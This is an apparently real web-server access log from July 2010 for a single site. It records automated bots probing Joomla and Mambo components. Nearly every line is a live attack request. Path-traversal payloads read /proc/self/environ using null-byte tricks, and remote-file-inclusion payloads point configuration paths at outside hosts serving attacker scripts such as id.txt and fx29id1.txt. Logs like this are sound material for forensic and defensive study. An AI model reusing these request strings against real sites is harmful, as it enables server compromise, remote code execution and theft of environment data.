74.208.96.47 - - [02/Jul/2010:07:15:25 -0700] "POST /logs/access_091210.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:26 -0700] "POST /logs/access_091203.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:34 -0700] "POST /logs/access_091203.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:47 -0700] "POST /logs/access_091203.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:48 -0700] "POST /logs/access_091210.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:15:46 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:56 -0700] "POST /logs/access_091203.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:16:04 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:16:04 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
211.25.130.94 - - [02/Jul/2010:07:17:14 -0700] "GET /index.php?option=com_wrapper&Itemid=&mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.elfagr.net"
211.25.130.94 - - [02/Jul/2010:07:17:14 -0700] "GET /logs//index.php?option=com_wrapper&Itemid=&mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:17:30 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:17:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:17:30 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:17:42 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:17:31 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:18:23 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:18:34 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:19:21 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:19:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:19:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:19:18 -0700] "GET /index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
72.52.150.147 - - [02/Jul/2010:07:19:20 -0700] "GET /logs//purchase.html.php?mosConfig_absolute_path=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
72.52.150.147 - - [02/Jul/2010:07:19:20 -0700] "GET /purchase.html.php?mosConfig_absolute_path=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:20:47 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:07:20:54 -0700] "GET /logs//purchase.html.php?mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:07:20:54 -0700] "GET /purchase.html.php?mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:21:06 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:21:39 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:23:50 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:25:46 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:25:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:26:33 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:26:44 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:30:05 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:29:55 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:01 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:01 -0700] "GET /logs/access_091015.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:01 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:01 -0700] "GET /logs/access_091029.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:24 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:24 -0700] "GET /logs/access_091029.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:24 -0700] "GET /logs/access_091015.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:32:34 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
218.150.85.170 - - [02/Jul/2010:07:34:56 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.825" "www.elfagr.net"
218.150.85.170 - - [02/Jul/2010:07:35:07 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.825" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:35:22 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:35:33 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:35:23 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:35:48 -0700] "GET /logs/access_100121.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:37:52 -0700] "GET /logs/access_091119.log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:38:02 -0700] "GET /index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:37:52 -0700] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:00 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:11 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:11 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:02 -0700] "GET /logs/access_091203.log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:07 -0700] "GET /logs/access_091119.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:07 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:17 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:39:21 -0700] "GET /logs/access_100225.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:07:39:52 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:07:40:03 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:07:40:04 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:07:40:05 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:40:30 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:41:25 -0700] "GET /logs/access_091210.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:41:35 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:41:35 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:41:36 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
174.121.91.236 - - [02/Jul/2010:07:41:55 -0700] "GET /logs/?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.elfagr.net"
174.121.91.236 - - [02/Jul/2010:07:41:55 -0700] "GET /?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "www.elfagr.net"
67.159.44.97 - - [02/Jul/2010:07:42:36 -0700] "GET /logs/?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.831" "www.elfagr.net"
67.159.44.97 - - [02/Jul/2010:07:42:46 -0700] "GET /?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.831" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:43:14 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:43:14 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:44:48 -0700] "GET /logs/access_091217.log%20%20////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:44:48 -0700] "GET ///////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1470 "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:44:59 -0700] "GET /logs////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:07:44:49 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:07:45:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:44:58 -0700] "GET /logs/access_091210.log%20%20////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
218.150.85.170 - - [02/Jul/2010:07:45:56 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.825" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:49:43 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:49:43 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:49:44 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:53:34 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:53:34 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:53:44 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:53:41 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:53:43 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:53:43 -0700] "GET /logs/access_091022.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:53:53 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:53:43 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:53:54 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:53:44 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:53:53 -0700] "GET /logs/access_091022.log%20%20////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:53:53 -0700] "GET /logs////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:54:04 -0700] "GET ///////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1470 "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:54:11 -0700] "GET /logs/access_091015.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:07:54:22 -0700] "GET /logs/access_091126.log%20%20////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:54:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:54:27 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:54:27 -0700] "GET /logs/access_091022.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:07:54:27 -0700] "GET /logs/access_091015.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:54:58 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:55:08 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:57:14 -0700] "GET /logs/access_091126.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:57:43 -0700] "GET /logs/access_100225.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:57:33 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:57:43 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:57:35 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:08:00:32 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:08:00:51 -0700] "GET /logs/access_091126.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:08:01:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:08:01:33 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
